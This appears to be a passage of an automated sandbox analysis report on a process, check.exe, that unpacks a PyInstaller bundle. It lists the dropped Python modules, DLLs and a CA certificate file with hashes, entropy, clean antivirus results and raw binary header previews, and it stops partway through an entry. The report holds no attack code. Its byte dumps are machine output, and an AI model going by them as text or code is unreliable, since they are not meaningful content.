                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\_bz2.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):84240
                                                                                                                                                                                                                                      Entropy (8bit):6.607563436050078
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
                                                                                                                                                                                                                                      MD5:CB8C06C8FA9E61E4AC5F22EEBF7F1D00
                                                                                                                                                                                                                                      SHA1:D8E0DFC8127749947B09F17C8848166BAC659F0D
                                                                                                                                                                                                                                      SHA-256:FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
                                                                                                                                                                                                                                      SHA-512:E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\_ctypes.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):131344
                                                                                                                                                                                                                                      Entropy (8bit):6.311142284249784
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
                                                                                                                                                                                                                                      MD5:A55E57D7594303C89B5F7A1D1D6F2B67
                                                                                                                                                                                                                                      SHA1:904A9304A07716497CF3E4EAAFD82715874C94F1
                                                                                                                                                                                                                                      SHA-256:F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
                                                                                                                                                                                                                                      SHA-512:FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\_decimal.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):277776
                                                                                                                                                                                                                                      Entropy (8bit):6.5855511991551
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
                                                                                                                                                                                                                                      MD5:F3377F3DE29579140E2BBAEEFD334D4F
                                                                                                                                                                                                                                      SHA1:B3076C564DBDFD4CA1B7CC76F36448B0088E2341
                                                                                                                                                                                                                                      SHA-256:B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
                                                                                                                                                                                                                                      SHA-512:34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\_hashlib.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):64272
                                                                                                                                                                                                                                      Entropy (8bit):6.220967684620152
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
                                                                                                                                                                                                                                      MD5:32D76C9ABD65A5D2671AEEDE189BC290
                                                                                                                                                                                                                                      SHA1:0D4440C9652B92B40BB92C20F3474F14E34F8D62
                                                                                                                                                                                                                                      SHA-256:838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
                                                                                                                                                                                                                                      SHA-512:49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\_lzma.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157968
                                                                                                                                                                                                                                      Entropy (8bit):6.854644275249963
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
                                                                                                                                                                                                                                      MD5:1BA022D42024A655CF289544AE461FB8
                                                                                                                                                                                                                                      SHA1:9772A31083223ECF66751FF3851D2E3303A0764C
                                                                                                                                                                                                                                      SHA-256:D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
                                                                                                                                                                                                                                      SHA-512:2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\_queue.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):33552
                                                                                                                                                                                                                                      Entropy (8bit):6.446391764486538
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
                                                                                                                                                                                                                                      MD5:1C03CAA59B5E4A7FB9B998D8C1DA165A
                                                                                                                                                                                                                                      SHA1:8A318F80A705C64076E22913C2206D9247D30CD7
                                                                                                                                                                                                                                      SHA-256:B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
                                                                                                                                                                                                                                      SHA-512:783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\_socket.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):83728
                                                                                                                                                                                                                                      Entropy (8bit):6.331814573029388
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
                                                                                                                                                                                                                                      MD5:FE896371430BD9551717EF12A3E7E818
                                                                                                                                                                                                                                      SHA1:E2A7716E9CE840E53E8FC79D50A77F40B353C954
                                                                                                                                                                                                                                      SHA-256:35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
                                                                                                                                                                                                                                      SHA-512:67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\_ssl.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):181520
                                                                                                                                                                                                                                      Entropy (8bit):5.972827303352998
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
                                                                                                                                                                                                                                      MD5:1C0E3E447F719FBE2601D0683EA566FC
                                                                                                                                                                                                                                      SHA1:5321AB73B36675B238AB3F798C278195223CD7B1
                                                                                                                                                                                                                                      SHA-256:63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
                                                                                                                                                                                                                                      SHA-512:E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\_wmi.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38160
                                                                                                                                                                                                                                      Entropy (8bit):6.338856805460127
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
                                                                                                                                                                                                                                      MD5:1C30CC7DF3BD168D883E93C593890B43
                                                                                                                                                                                                                                      SHA1:31465425F349DAE4EDAC9D0FEABC23CE83400807
                                                                                                                                                                                                                                      SHA-256:6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
                                                                                                                                                                                                                                      SHA-512:267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\base_library.zip

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1394456
                                                                                                                                                                                                                                      Entropy (8bit):5.531698507573688
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                                                      MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                                                      SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                                                      SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                                                      SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\certifi\cacert.pem

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):299427
                                                                                                                                                                                                                                      Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                                      MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                                      SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                                      SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                                      SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md.cp313-win_amd64.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                                                                                      Entropy (8bit):4.818583535960129
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
                                                                                                                                                                                                                                      MD5:56FE4F6C7E88212161F49E823CCC989A
                                                                                                                                                                                                                                      SHA1:16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
                                                                                                                                                                                                                                      SHA-256:002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
                                                                                                                                                                                                                                      SHA-512:7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md__mypyc.cp313-win_amd64.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):124928
                                                                                                                                                                                                                                      Entropy (8bit):5.953784637413928
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
                                                                                                                                                                                                                                      MD5:10116447F9276F10664BA85A5614BA3A
                                                                                                                                                                                                                                      SHA1:EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
                                                                                                                                                                                                                                      SHA-256:C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
                                                                                                                                                                                                                                      SHA-512:C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\libcrypto-3.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5232408
                                                                                                                                                                                                                                      Entropy (8bit):5.940072183736028
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                                                      MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                                                      SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                                                      SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                                                      SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\libffi-8.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):39696
                                                                                                                                                                                                                                      Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                      Encrypted:false
